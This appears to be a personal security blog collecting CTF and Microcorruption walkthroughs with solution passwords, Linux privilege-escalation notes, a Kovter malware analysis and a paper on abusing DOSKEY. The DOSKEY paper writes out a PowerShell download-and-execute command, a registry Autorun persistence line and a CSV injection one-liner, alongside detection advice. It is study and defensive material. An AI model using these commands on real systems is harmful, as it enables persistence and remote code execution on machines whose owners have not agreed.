POL1TC@L HOOK
  • Home
  • About
  • Cyber Security
  • Politics
  • Sports
  • Contact

wargames CTF - deus x64 one

2/10/2024

0 Comments

 
Reverse Engineering CTF. 

These are a series of challenges which need to be solved. We will be using Binary Ninja to reverse engineer the program. The program looks as follows with 3 different sections: 
Picture

1. x64_ASM

Lets begin with section 1) x64_ASM. After pressing 1, we are presented with the following screen which asks for 2 args: 
Picture
Lets begin reverse engineering. 
The source code shows this function which handles the logic. 
Picture
As we can see the instruction_test(arg1, arg2) function plays a crucial role. Lets take a look at its assembly 
Picture
Very simple. If the result of the function does not equal 0x7a69 (31337), evaluation failed. Going back to the assembly provided in the first screenshot, some quick maths gives us the answer 30569. Therefore arg1 = 0 and arg2 = 30569
Picture

2. serial

The second challenge asks for a serial.
Picture
Source code below:
Picture
As you can see, the check_serial(serial) function does the heavy lifting. Lets analyse its assembly.
Picture
The check_serial function looks to see if each value of arg1 is a particular number converting these hex to ascii gives us the following serial number: ​189715
Picture

3. encrypt

The third and final challenge asks for a password 
Picture
If you provide a password of the wrong length you receive this error:
Picture
Lets look at the code and begin reverse engineering. As we can see from the code below, the password needs to 14 characters long (0xe = 14).
Picture
Picture
Providing a password of length 14 gives us this screen.
Picture
It appears to check each character. Analysing the earlier source code and assembly shows the check is done under encryption_check(password). Lets disassemble this function. 
Picture
Following the logic of the disassembled function, we can see that it takes our arguments and encrypts them via XOR against 0x17. If the output does not equal gW""`xesHav{~s, then it goes to the invalid_encryped_char() function. 
Therefore gW""`xesHav{~s is our encrypted string and with this, we can write a very simple decryption routine to obtain the password.
Picture
Quick C++ program I wrote to decrypt and encrypt the strings for demo purposes. The decrypt function essentially reverses the XOR encryption routine. Encrypt function shows how the CTF challenge encrypts the password in the first place. Running the program outputs the following. 

1) The decrypted string = p@55w0rd_valid
2) The encrypted string = gW""`xesHav{~s
Picture
Entering the decrypted string into the CTF challenge shows us:
Picture
Finished. Hope you enjoyed it.
0 Comments

Linux Privilege Escalation - Part Four

2/9/2024

1 Comment

 
5) Shared Object Library Hijacking/Injection
6) Exploits
​

Shared Object library hijacking/injection

From the title you can probably deduce what this is about. This method involves:
1) finding a binary/file/service which has SUID bit set and owned by root. 
2) Checking to find if the file has is vulnerable to hijacking 
3) Replacing the library with a malicious one
​4) profit

Finding a SUID file to exploit is simple. See below:
​
Picture
Now we have our list of vulnerable SUID binaries, time to pick one to exploit. For demo purposes i'm choosing the last one. 
Now we need to check whether the file is actually vulnerable. Luckily we can do this with strace. 
Strace is a linux util which helps with tracing system calls. For us, we can find open calls to files which are missing or replaceable. See below: 
Picture
We can see the SUID binary is vulnerable as it to open a library(./libcalc.so). However it is possible for us to overwrite this library as its located in a writable folder. Next we create our malware (which just executes /bin/sh). 
Picture
Next, compile your malicious code and replace the innocent library with your malicious one. Make sure to name your malicious library exactly the same as the innocent one we replace. Run the SUID binary and hopefully it will load your code and you'll get a root shell
Picture

Linux Exploits


Check which the of binaries with SUID is vulnerable to exploits. Try to compare against a exploit database such as exploit-db. Once you've found one, give it a go. Below i'm exploiting a vulnerable exim service with a well known exploit. Code below.
Picture
Root Shell :) 
Picture
A simple and easy kernel exploit is the famous dirtyc0w exploit[CVE-2016-5195]. I wont go into the intricacies with the code. Running the exploit shows this:  
Picture
Root Shell :)
Picture
1 Comment

linux privilege escalation - Part three

1/7/2023

0 Comments

 
4) CronJobs
    4.1) CronJobs - File Permissions
    4.2) CronJobs - Path Environment Variables
    4.3) CronJobs - Wildcards

CronJob - File permissions

The involves looking for instances in which a cronjob touches a writable root file we can overwrite. Taking a look at /etc/cronjob/ we can see which files have a cron schedule.
Picture
Notice how overwrite.sh has root permissions. We can then inject malicious code into overwrite.sh  which will get executed with root permissions. Check you can overwrite it:

Picture
Overwrite the file with malicious code (reverse shell) of yours. Mine is shown below:
Picture
Set up a listener and wait for the cronjob to run the file which we've just placed malicious code into. Root access achieved below
Picture

Cronjob - path environment variables

Here we are going to hijack the PATH variable of the overwrite.sh. Look at the image below and notice how the overwrite.sh file does not have an exact path. This means we could hijack it:
Picture
Create a file called overwrite.sh in the home directory. Place malicious code into our overwrite.sh. Mine is a simple reverse shell from earlier
Picture
Create the listener with Netcat and wait for root shell.
Picture

CRONJOBS - WIldcards

We can also abuse wildcards to try and get root. Lets look at the file /usr/local/bin/compress.sh which also has root privileges
Picture
Notice how it uses a tar command with a wildcard? this is something we can exploit. If we can create a file with the same names as arguments which are passed to the tar command we can get it to execute malicious code.
Create two files using the following command:
Picture
Have a listener set up to receive the connection. Once the cronjob runs, it will run compress.sh which will run the tar command, which executes our malicious shell.sh with root privileges. 
Picture
0 Comments

linux privilege escalation - part two

1/2/2023

0 Comments

 
2) Shell Escape Sequences
3) Sudo  Environment Variable Hijacking


Shell Escape Sequences / Gtfobins / living off the land

whatever you want to call it, this involves using native binaries and their functions to achieve root privileges. First step is finding out which binaries run as root:
Picture

Then compare this list with GTFOBins. See if you can use them to get root as shown below:
Picture
Another example using apache2 to read /etc/shadow
Picture


sudo environment variables - LD_PRELOAD

sudo can inherit environment variables, you can check for these by doing sudo -l as shown above. Keep an eye out for env_keep*
  • LD_PRELOAD is inherited from the users environment. It can preload shared object libraries before the program runs 
  • LD_LIBRARY_PATH provides a list of directories to search for shared object libraries.

The goal to is "hijack" these enviroment variables with a malicious shared object library. First we must create a Shared Object Library called preload.so.
Picture
This is the original C code below:

Picture
We can now run a program which was listed when we did "sudo -l" (in this case its iftop) and load the malicious shared object library via LD_PRELOAD:

Picture

sudo environment variables - LD_library_path

We will now do something very similar but with LD_LIBRARY_PATH. This involves creating a malicious shared library with the same name as an incumbent library and hijacking LD_LIBRARY_PATH. We'll be attacking the apache2 binary. First find out which libraries are loaded by apache2:
Picture
Now create a malicious shared object library name with the same name as an already existing library
Picture
The original C code of library_path.c

Picture
Next, provide the path containing the malicious library while executing the sudo binary:

Picture
0 Comments

Linux Privilege escalation - part one

12/31/2022

0 Comments

 
Today we'll be talking about Linux Privilege Escalation, the process of elevating your privileges on a linux system. Everything is done via a CTF and TryHackMe. i'll be adding to this until its complete.
1) Weak file Permissions
   1.1) Readable /etc/shadow
   1.2) Writable /etc/shadow
   1.3) Writable /etc/passwd

Picture


Service Exploits

Not a huge amount here. Quick scan of the system should allow attackers to find openings of a Service Exploit
ExploitDB usually has a nice array of exploits which can be used.

Weak File Permissions - readable /etc/shadow

The shadow file contains user passwords hashes and is usually readable only by root. However, if it can read by an attacker, there is possibility for an escalation. Below shows a world readable /etc/shadow file.
Picture
Reading the file shows the following:

Picture
Quick rundown courtesy of /etc/shadow courtesy of  cyberciti.biz (Below if from their website):

" Basically, the /etc/shadow file stores secure user account information. All fields are separated by a colon (:) symbol. It contains one entry per line for each user listed in /etc/passwd file. Generally, shadow file entry looks as follows (click to enlarge image):
/etc/shadow file format (click to enlarge)

As with the /etc/passwd, each field in the shadow file is also separated with “:” colon characters as follows:

  1. Username : A valid account name, which exist on the system.
  2. Password : Your encrypted password is in hash format. The password should be minimum 15-20 characters long including special characters, digits, lower case alphabetic and more. Usually password format is set to $id$salt$hashed, The $id is the algorithm used On GNU/Linux as follows:
    1. $1$ is MD5
    2. $2a$ is Blowfish
    3. $2y$ is Blowfish
    4. $5$ is SHA-256
    5. $6$ is SHA-512
  3. Last password change (lastchanged) : The date of the last password change, expressed as the number of days since Jan 1, 1970 (Unix time). The value 0 has a special meaning, which is that the user should change her password the next time she will log in the system. An empty field means that password aging features are disabled.
  4. Minimum : The minimum number of days required between password changes i.e. the number of days left before the user is allowed to change her password again. An empty field and value 0 mean that there are no minimum password age.
  5. Maximum : The maximum number of days the password is valid, after that user is forced to change her password again.
  6. Warn : The number of days before password is to expire that user is warned that his/her password must be changed
  7. Inactive : The number of days after password expires that account is disabled.
  8. Expire : The date of expiration of the account, expressed as the number of days since Jan 1, 1970.
"

Picture

Onto cracking the hash via hashcat:

Picture

Finally the hash is cracked :)

Picture
Log into root
Picture

weak file permissions - writable etc/shadow

Idea behind this one is simple. If the etc/shadow file is writable, perhaps we can write ourselves into the file? Below shows the file is world writable:

Picture
Create a new password via:

Picture
place the new hash into the etc/shadow file,
Picture
Picture

weak file permissions - writable etc/passwd

Much like the one above, if the etc/passwd file is writable, you can place your own user in or edit a current one. Again the file in question is world writable:

Picture
Create new password hash for passwd file.
Picture
Picture
Save the file and switch to he root user
Picture
0 Comments

microcorruption: level 4 - cusco

12/22/2022

0 Comments

 
First stack overflow
 
Again, notice how It says the password has to be between 8 and 16 characters? Good clue.
Furthermore, inputting 17 characters causes the program to crash
​
Picture
Looking through the code we can see there are no cmp functions. It is therefore reasonable to believe a overflow is required to redirect input to the unlock function.
Entering x > 16 shows the stack being overwritten which confirms a stack overflow:

​
Picture
​We can input the value of unlock_door function to overwrite the stack and open the door
 
Password: 414141414141414141414141414141414644
0 Comments

microcorruption: Level 3 -Hanoi

12/22/2022

0 Comments

 
​This level was also simple although a bit harder than the previous levels.
 
The main function is extremely short, passing off much of the work to the login function.
Here it prints out the a series of strings using a puts function. The most important string being:
 
“Remember: passwords are between 8 and 16 characters:”.
 
Due to this we can assume some kind of overflow is expected. Later on within the function it tries to compare hex value 0x11 with memory address &0x2410.
To do so, the final (17th) character would need to be a hex encoded character. This would be 11

Picture

Password: ​4141414141414141414141414141414211
0 Comments

Splunk/Python  Web Application

12/11/2022

0 Comments

 
Link to my Github
​I created a little web application in python which can retrieve search results from splunk, displaying them neatly on the webpage.
 
I envision it being used by engineers to check whether devices/Universal forwarders are logging to splunk. Code available on my Github

​
Let’s begin
​
Picture
​I wrote the webapp in python using the flask web framework. My reasoning for this was that flask is lightweight and fast with little complications. This is in contrast to what I’ve heard with other frameworks such as Django, which is not ideal for small application as it can be quite cumbersome.
 
Intro
 
The application is comprised of the following:
 
1)SplunkLoggingChecker.py – This is the core of the program
2)*.html files which are called upon when needed.
2.1) device_not_found.html – self explanatory
2.2) about.html – About page
2.3) search.html – Home page
 
Lets go through each file to gain an understanding of how it works.
 
SplunkLoggingChecker.py
 
The core mechanics is simple, SplunkLoggingChecker will connect into splunk, run searches and then retrieve the output. This is done by connecting into splunk web port (in my case http://localhost:8089) using an account created on splunk search head. Its best practice to limit the capabilities of this account. Failure to do so, could lead to data leak. However even this is unlikely due to the way searches are constructed (more on this later).
 
Credentials to the splunk account can be hardcoded as shown below:
​
Picture
​Password has been obfuscated and is contained within its own module:
​
Picture

Not complicated to reverse engineer but choice is yours. 
 
Next the application is where searches which will be sent to splunk are located. Notice how the hosts and hostuf inputs are concatenated into the search string. This means that wildcards can be used. There is also additional protection in the form of input validation to prevent malicious behaviour:

Picture
​The application will then attempt to connect into the splunk instance using the username and password
Picture

​It will then try to parse the results, save them to an array and iterate through them before sending them to results.html to be displayed.

Picture
Picture

​If no results are found, the following is shown

Picture

​​The application also has other pages and error handling capabilities. If presented with a 404 error, it returns page not found. It also has an about page for more detail on its usage.
 
SplunkLoggingChecker.py – Logging capability
 
The application uses Python logging module to write logs to a .log file as shown below
Picture

​Whenever a problem or logging information could occur the following is placed in to capture it:
 
app.logger.error(“[Error message of your choice]”)

The log file shown below:
​
Picture

​You can then try to ingest the log file back into splunk for bonus points:

Picture
​Results.html
 
Not as complicated as SplunkLoggingChecker.py but still deserving of its own section. This receives the results from SplunkLoggingChecker.py and prints out each element of the array using a for loop as shown below:
Picture

overview

Quick diagram for overview
Picture

conclusion

​So there’s my python flask web application to retrieve search results from splunk. Try not to critique the coding practices too hard :D. Nevertheless hope it was informative or at least entertaining.
0 Comments

Malware analysis - Analysing Kovter

12/9/2022

0 Comments

 
​Today we are going to talk about analysing the Kovter malware. For those unfamiliar with Kovter, it gained fame in 2015 for being one of the more prominent attacks which utilised living of the land attacks.  Before we begin, there are several concepts which must be explained

1) living off the land – Living off the land refers to using native or signed scripts/binaries to further an attackers goal 

2) Sysmon – Sysmon refers to a tool created by Microsoft which enhances Microsoft wineventlog by providing addition logging based on event codes. It also allows for the customisation as it can ingests a XML with custom command which can monitor select files/ports as shown below 
​
Picture
Lab Setup
​
Picture
  1. Splunk infrastructure
  • Universal Forwarder helps to forward logs to the indexer. It is then searched from the search head 
  1. Kovter Malware is run on Windows 10 virtual machine 
  2. Sysmon installed on Windows 10 VM
  3. Fakenet mimics the internet to prevent kovter from reaching command and control servers
  4. No AV. We need Kovter to run without being
  5. UAC disabled, need Kovter to run without being hindered​


​kovter overview

After sifting through the logs using splunk which were enhanced by SYSMON, I was able to come to the following conclusion. 

  1. Kovter uses WMIprives (PID 2692) to launch mshta( PID 7824), unsure of how this is done. Could be command line or perhaps using WMI script. 
  2. Powershell then downloads a script which runs in memory
  3. I believe the script the runs regsvr32 (PID4740) which completes many tasks

3.1) Sets the value under HKU\S-1-5-21-3652906336-4086003666-492231068-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1809 to 0x00000003. This allows pop ups on internet explorer

3.2)  Sets the value under HKU\S-1-5-21-3652906336-4086003666-492231068-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1206 to 0. This allows scripting of Internet explorers Web Browser security control

3.3) Places Malicious bat file in registry for persistence. This executes another mshta upon restart 

3.4 Write a separate registry entry which reads payload

Registry persistence and tricks

Kovter took advantage of Registry Jumping. File extension class .251b2fb data pointed to HKEY_USERS\S-1-5-21-3652906336-4086003666-492231068-1000_Classes\522960\shell\open\command which contained our malicious mshta command.

It also used extended characters to obstruct analysis
Picture
As you can see, the fields all appear to have data in the fields. However clicking on the value htavir (probably after hta virus, why though?) shows no data. In fact clicking and attempting to edit the box failed. After dumping the registry hive to disk and analysing, I believe the issue is this highlighted below:​
Picture
This extended character helps to stop analysts from  inputting any data and tampering with the payload 

Thanks for reading

0 Comments

Malicious DOSKEY: Using DOSKEY for Malicious Code Execution

3/9/2020

0 Comments

 

Abstract

As the world becomes further and further connected, the risk of cyber-attacks increases. Cyber criminals are creating malware at a record rate previously unseen before. They are also creating more ingenious methods of code execution to help increase their criminal activities, both in size and sophistication. This paper will detail a new method of using the Windows command “DOSKEY” for code execution. It will also present methods of detecting and mitigating such attacks.
DOSKEY is a DOS utility within Microsoft Windows which adds additional features to command line processors. It was introduced in the summer of 1991 and has been present in every variation of Windows since.
​
Usage (Microsoft, 2017)
doskey [/reinstall] [/listsize=<Size>] [/macros:[all | <ExeName>] [/history] [/insert | /overstrike] [/exename=<ExeName>] [/macrofile=<FileName>] [<MacroName>=[<Text>]]
 
Parameter
Description
/reinstall
Installs a new copy of DOSKEY.exe and clears the command history buffer.

/listsize=<Size>
Specifies the maximum number of commands in the history buffer.

/macros
Displays a list of all DOSKEY macros. You can use the redirection symbol (>) with /macros to redirect the list to a file. You can abbreviate /macros to /m.

/macros:all
Displays DOSKEY macros for all executables.

/macros:<ExeName>
Displays DOSKEY macros for the executable specified by ExeName.

/history
Displays all commands that are stored in memory. You can use the redirection symbol (>) with /history to redirect the list to a file. You can abbreviate /history as /h.

[/insert
/overstrike]

/exename=<ExeName>
Specifies the program (that is, executable) in which the doskey macro runs.

/macrofile=<FileName>
Specifies a file that contains the macros that you want to install.

<MacroName>=[]
Creates a macro that carries out the commands specified by Text. MacroName specifies the name you want to assign to the macro. Text specifies the commands you want to record. If Text is left blank, MacroName is cleared of any assigned commands.

/?
Displays help at the command prompt.


The main use of DOSKEY was the creation of aliases (MACRO defintions). It was widely used by those who primarily worked on Linux systems but had difficulty adjusting to the limited commands of cmd.exe. However since the inception of powershell, its use and importance has decreased. The figure below shows one use. It demonstrates the assigning of “ls” to “dir”.
​
Picture


Code Execution Capability 

​DOSKEY’s most interesting ability is that it allows for code and .exe execution. Simply assigning an alias to an executable file allows for file execution as shown by the image below. This is the primary feature of DOSKEY which we will be abusing throughout this paper.
​
Picture


​loading macros

DOSKEY also has the capacity to load MACRO definitions from files. If many macros are written within a text file, the macros can be loaded directly into cmd.exe instead of loading them manually one by one, as shown in previous figures. For example, imagine a text file with the following:
LS = DIR
T = TREE
PS = POWERSHELL
 
Rather than having to manually type these macros out every time CMD is opened, the user could simply load the entire text file with the following command:
DOSKEY /macrofile=C:\Users\User\Desktop\test.txt
However, it is important to note DOSKEY loading of macro file is not limited to text files. In fact, DOKSEY can load MACRO’s from virtually any file, if it can read into it. DOSKEY can load MACRO’s from the following files:
Text files
HTML files
.SYS files
Word files
Excel files
.EXE files
 
It is likely DOSKEY could read into other files, but these are the files which will are known and will be focusing on.
​

Remote code execution using doskey

Using DOSKEY for malicious purposes is quite simple. It abuses the Code Execution and Macro Loading capability built into it.
The first step would be assigning a character to a malicious action. In this situation it will be the following PowerShell string:

Powershell(new-object System.Net.WebClient).Downloadfile('http://www.pdf995.com/samples/pdf.pdf', 'C:\Users\Amar\Desktop\test.pdf') ; cmd /c 'C:\Users\Amar\Desktop\test.pdf'

This PowerShell command will download a file from a remote server and execute it. This is a tactic used extensively by attackers and the purpose of using this string, is to replicate the attacks utilized by malware without damaging our system. NOTE: The string itself is not malicious and only serves to mimic the downloading and executing of a remote file.
We will assign the full stop character (“.”) to this string. The reason being is that this character is unlikely to create suspicion. This will be hidden within a jpg file called legit.jpg
Our malicious MACRO definition now looks like this:

.=Powershell(new-object System.Net.WebClient).Downloadfile('http://www.pdf995.com/samples/pdf.pdf', 'C:\Users\Amar\Desktop\test.pdf') ; cmd /c 'C:\Users\Amar\Desktop\test.pdf'

To ensure that legit.jpg is loaded each time command prompt is run, we will need to add it to the registry. This can be done either through regedit or command prompt via the following string:
reg add "HKCU\Software\Microsoft\Command Processor" /v Autorun /d "doskey /macrofile=\"Users\Desktop\legit.jpg\"" /f
This creates the automatic loading of legit.jpg which contains our malicious PowerShell string to the command prompt.
Triggering the malicious character (“.”) relies on using both PowerShell and Windows Script Host’s SendKeys method to input the malicious character triggering the attack. This is done using the following code.

powershell $wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys(""".{ENTER}exit{ENTER}""")

The below string shows the complete one liner to abuse CSV injection.
=cmd|' /C reg add "HKCU\Software\Microsoft\Command Processor" /v Autorun /d "doskey /macrofile="C:\Users\Amar\Desktop\legit.jpg"" /f && start cmd /k powershell $wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys(""".{ENTER}exit{ENTER}""")  '!_xlbgnm.A1


​obscuring malware within macro file

​Simply placing the malicious MACRO definition within a text file would be too easy to locate for a forensic investigator. However, due to the DOSKEY’s ability to load definitions from any file it can read into, we can better disguise our malicious string. One place to start is with HTML files. Placing a malicious string within a normal looking HTML file filled with code could prove time consuming for investigators to analyse. However, this presents the problem of “invalid macro definition”. Everything which is placed within the file would be loaded by DOSKEY and when this does not conform to the correct criteria of creating a macro, “invalid macro definition” appears. This is shown in the screen shot below.
​
Picture

​DOSKEY proceeds to load the MACRO definitions from the MACRO file. However, it presents several instances of “invalid macro definition”. While this does not stop execution it is not stealthy.
To combat this, there must be no invalid macro definitions. To do so, we must look at the criteria needed to declare a macro definition.

<MacroName>=[]
Creates a macro that carries out the commands specified by Text. MacroName specifies the name you want to assign to the macro. Text specifies the commands you want to record. If Text is left blank, MacroName is cleared of any assigned commands. (Microsoft, 2017)

All that is needed is to add an “equals” sign to declare a macro definition. This will take all code (which is obscuring the Malicious string) and turn it into a macro definition. This will remove the “invalid macro definition” alert which could alert an investigator to our presence. An example of this is the screenshot below which demonstrates this method.

Picture

​Furthermore, the screenshot below demonstrates once the attack is executed there are no longer any invalid macro definitions resulting in a much more stealthier attack. We can see that instead the attack enters the full stop and would launch the malware without any problems.

Picture

​Once the issue of invalid macro definitions has been resolved, any file type which DOSKEY can be read into, can be used to host the malicious string.


​Defending against doskey abuse

There are several approaches which can be pursued to defend against such attacks. The first would be to check the registry path HKCU\Software\Microsoft\Command Processor. This would be to see if command prompt is automatically loading a DOSKEY MACRO file. However, this by itself may not be sufficient as attackers may find alternative ways to automatically load MACRO files.

​Another method could be to use “DOSKEY /m”. This would reveal any macros which would have been loaded into cmd.exe. This may be the best method as there is very little attackers can do to defend against this kind of analysis. However even this presents problems. If many macros have been loaded, finding the malware can prove quite difficult, especially if binary data has been loaded to obscure the macro as shown below.

Picture

​On the other hand, investigators can use DOSKEY /m > log.txt to create a file to analyse. While this may not completely fix the obfuscation problem, it can help with analysis.
DOSKEY also offers a “/h” parameter which shows the history of the current session. If researchers are able to persist this across all and any sessions, they could see every command entered into cmd.exe. However, attackers could defeat this by using command “DOSKEY /listsize=1”. This would limit the history kept by DOSKEY to just one command, which would always be “DOSKEY /h”. While “/h” can be a useful forensic tool, it should not be heavily relied upon.
Other indicators of abuse could be a change of binary data of the file. Files which have had their binary data tampered with will not open correctly and would be indicative of being changed/altered. Furthermore, these files should be analysed under a hex editor to determine if they contain a malicious MACRO definition or not as shown below.
​
Picture


Conclusion

​DOSKEY may not be the most sophisticated method of attack which can be used. In fact, there are many other methods which are much more effective and less intrusive on the network. However, the awkwardness and ambiguity of DOSKEY abuse could provide problems for investigators and another method for attackers to further infiltrate systems, especially considering that DOSKEY is installed by default on every version of windows since MS DOS 5.0 and is relatively ignored.
DOSKEY abuse follows the trend set by attackers of using many little instances which seem individually innocent, but together create a much more malicious picture. The VB script entering a character to cmd may not seem inherently malicious, and a file which does not trigger antivirus may seem innocent, but when placed together they can allow attackers to achieve persistence on a system and push further into the network.
0 Comments

microcorruption: level 2 - sydney

6/13/2019

 
​This the second level of Microcorruption. If you haven’t seen the first level, please go back.
Let’s Begin!
 
This level is slightly more difficult than the previous level, but again nothing strenuous. Scrolling through the disassembly we again see the check_password function. Quick analysis of it shows several compare functions (cmp). This shows us its comparing our input to a hard-coded password little by little.
​ 
Picture

​Converting these Hex values gives us the following password: Sl)pQ/*b
However, we must take into account the endianness of the system. Simply put, there are two ways to arrange data in memory, big endian and little endian.
In big-endian the most significant byte, the byte containing the most significant bit (the leftmost byte), is stored first, at the lowest address. The least significant byte, then, has the higher address.
In little-endian the least significant byte, (the rightmost byte) is stored first, at the lowest address. The most significant byte, then, has the higher address.
The diagram below explains how this works. 
​
Picture

​This essentially means we have to change the alphabetical order of our passwords around. E.g the first hex value may be “0x536c = Sl”, this in reality should be “lS”. The endianness switches the position of the letters around. Doing this for all hex values gives us the correct password: lSp)/Qb*

Microcorruption: Level 1 - new orleans

1/16/2019

 
Picture
So this is the beginning of the Microcorruption CTF. It’s a embedded reverse engineering minigame. Please complete the Tutorial if you haven’t already before reading this. I recommend you read the lock manual as well. This will give you a basic understanding of LockIT and MSP430 Assembly.

DISCLAIMER: I’m really not an expert at reverse engineering/ assembly. If you notice a error on my behalf please tell me.

Lets begin

This level is very easy and can be solved in two different ways.
 
1) Check_password Function
First method is by analysing the check password function. Here we can see the compare being used between register r13 (your input) and memory address 0x2400. Going to the memory address reveals the password.



























2) Create_Password Function
 
In the previous method the password was found in memory, this method shows us that the password was actually hard-coded into the assembly and written to memory address 0x2400. 


Picture
​
The first instruction of the function moves r15 to the memory address. The remaining functions write the hardcoded password in. If your new, the hardcoded password is written in hex and highlighted in the yellow box.
 
Password: [mHub71

    Archives

    February 2024
    January 2023
    December 2022
    March 2020
    June 2019
    January 2019

    Categories

    All
    Malware
    Privilege Escalation
    Python
    Reverse Engineering
    Splunk

Powered by Create your own unique website with customizable templates.
  • Home
  • About
  • Cyber Security
  • Politics
  • Sports
  • Contact